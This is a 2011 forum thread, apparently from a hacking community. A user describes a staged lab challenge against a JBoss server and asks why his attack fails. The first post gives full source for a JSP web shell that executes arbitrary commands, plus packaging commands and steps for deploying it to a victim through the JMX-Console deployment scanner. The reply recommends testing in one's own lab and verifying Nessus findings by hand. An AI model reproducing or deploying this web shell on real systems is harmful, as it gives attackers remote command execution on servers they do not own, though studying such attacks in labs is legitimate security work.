Jump to content


Photo
- - - - -

breaking jboss with a browser? not happening


  • Please log in to reply
1 reply to this topic

#1 yberfreak

yberfreak

    Will I break 10 posts?

  • Members
  • 8 posts
  • Gender:Male

Posted 14 January 2011 - 02:30 PM

I have been given task to break into jboss application by my senior sec manager at my company.Its a hacking challenge staged in a test lab This is what i have been given. A web-access to jboss.Yes that pretty much it<3. He believes in less is more philosophy. With some get to start working info.I have been told that a vulnerability exists inthe application and its no 0 day exploit its an known vulnerability.It is set as an open-book challenge i can get help anywhere i like. So what i did so for?

Yes i google ; but i also run a nessus scan and the scan brought me one HIGH vulnerability.Its has to do with the default Jboss installation using the JMX-Console. Its not a new vulnerability i was able to reach this conclusion as i start googling. This particular vulnerabilityis very popular; I was saying to myself that my problems are over and i would be break it into jboss in record time. But that has been largely un-true. Why? Well if it wasn't true i wouldn't be here. I did the following (in steps)


attack vector: deployment scanner feature





1.confirmed the default installation (by accessing localhost:9090) in my case its 9090 not 8080 as in hacking literature. Probably this is because em using a new version (idk exact reason)



2.i wrote this jsp script(cmd.jsp) astold in sites.

<%@ page import="java.util.*,java.io.*"%>

<%

%>

<HTML><BODY>

Commands with JSP

<FORM METHOD="GET" NAME="myform"ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

out.println("Command: " + request.getParameter("cmd") +"<BR>");

Process p =Runtime.getRuntime().exec(request.getParameter("cmd"));

OutputStream os = p.getOutputStream();

InputStream in = p.getInputStream();

DataInputStream dis = new DataInputStream(in);

String disr = dis.readLine();

while ( disr != null ) {

out.println(disr);

disr = dis.readLine();

}

}

%>

</pre>

</BODY></HTML>



3.next i create a web.xml file to be placed in WEB-INF folder



<?xml version="1.0" ?>

<web-app xmlns="http://java.sun.com/xml/ns/j2ee"

xmlns:xsi="http://www.w3.org/20...chema-instance"

xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee

http://java.sun.com/...eb-app_2_4.xsd"

version="2.4">

<servlet>

<servlet-name>Command</servlet-name>

<jsp-file>/cmd.jsp</jsp-file>

</servlet>

</web-app>



4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF folder



jar cvf cmd.war WEB-INF cmd.jsp



5. I put this file in http-apache server. File cmd.war reside at htdocs folder. Can be accessed by url: mywebserver:80/cmd.war



6.i go back to jboss defualt page and navigate myself to jboss.deploymentpage.



7. in the addurl tab i enter path for my cmd.war file as

http://mywebserver/cmd.war



8. next i goto victim webserver in attempt to access my uploaded application http://victim:9090/cmd/cmd.jsp



9. i get HTTP STATUS 404- /cmd/cmd.jsp



my app is suppose to be hot deployed by the jboss; but this is not the case coz even after 10-20 times after u have access the file i get the same error page. I want to know what is the reason for the behavior. I know there exists other attack vector (e.g rmi and etc) but i want to stick to this until i don't figure out the reason for this failure of exploit.



Em i compiling the .jsp file with incorrect syntax? do i need to have tomcat server installed instead? I read it on internet that there could be some problems in the jboss trying to get reverse shell on your web-server as jboss is it work in bind-shell mode only? I'm really clueless to what i happening i spent 12 works on this single attack vector but em not making head-ways.



jboss gurus help me.



thanks

#2 phaedrus

phaedrus

    Gibson Hacker

  • Members
  • 90 posts
  • Gender:Male

Posted 20 January 2011 - 02:46 PM

why dont you set up a vulernable jboss server in your own lab, and verify your jar and attack proceedure works against a known weak target.
If it does, then they have patched the vuln or configured it to mitigate the vector away. Then you can move onto the rmi and other vectors. Nessus is full of false positives like that and part of the skill of driving it is to know how to pick the NASL script apart and verify the results, rather than just printing some management summary off and calling it done. Its not because nessus is terrible, it is because it relies on banner versions and other information for identification and sometimes a patch doesnt uplift the version number. Some vendors have forked some ancient codebase from bsd or the like back in the midst of time and never uplifted the version number, so nessus reports "OMG you can get root with telnet ~@" or the like when it does nothing of the sort.

I quite often do full installs of things I am interested in so I can look round and test things and see how they work without ruffling any feathers. And I always go through nessus scans verifying stuff by hand when it matters.

Edited by phaedrus, 20 January 2011 - 02:50 PM.





BinRev is hosted by the great people at Lunarpages!